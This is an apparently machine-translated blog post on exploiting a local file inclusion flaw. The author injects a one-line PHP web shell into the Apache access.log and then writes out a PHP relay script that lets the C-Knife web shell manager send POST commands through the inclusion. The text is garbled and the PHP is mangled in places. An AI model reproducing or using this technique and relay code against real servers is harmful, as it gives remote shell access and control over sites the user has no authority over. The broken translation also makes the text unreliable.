Post-file contains one of the vulnerabilities of a sentence using

Recently in the busy race, encountered a file containing a vulnerability, through the inclusion of Apache Access.log in a sentence, using Cknife to connect, but the get type is very easy, direct http://xxx/FilesIn.php?filename=. /apache/logs/access.log to be included in the use of the line. But when you encounter such a File Protection vulnerability.

The above method is completely ineffective, its own chopper, C-Knife configuration parameters also do not support post options, so this good loophole is not wasted? Using the cookies in the previous cookie injection, I wrote a simple script (c-knife for example).

First we write a sentence to the log first.

Then we can check on the target drone to see if the upload was successful.

Ok

Create the following script:

 
  '.. /apache/logs/access.log '), if (Isset ($_post["Croot"])//Here Croot change to your password {$tmp = array (' Croot ' =>$_post["Croot"]);// Here croot change to your password $data + = $tmp;} if (Isset ($_post["Action"])) {$tmp = array (' Action ' =>$_post["action"); $data + = $tmp;} if (Isset ($_post[' z1 ')) {$tmp = array (' z1 ' =>$_post["Z1"]), $data + = $tmp;} $data = Array (' filename ' = ' = '). /apache/logs/access.log ', ' croot ' = $postdata, ' action ' =$_post[' action '], ' z1 ' =$_post[' Z1 ']);//var_dump ($data); $data = Http_build_query ($data); $curl = Curl_init (); curl_setopt ($curl, Curlopt_url, $url); curl_setopt ($curl, Curlopt_ Returntransfer, 1); curl_setopt ($curl, Curlopt_post, 1); curl_setopt ($curl, Curlopt_postfields, $data); $rtdata = Curl_ EXEC ($curl); Curl_close ($curl); Echo $rtdata; >

Open the C-knife.

Build a local PHP server to connect to. Test effect

Ok. This time only for the PHP type of file management transfer processing, other management functions may not support the very good.

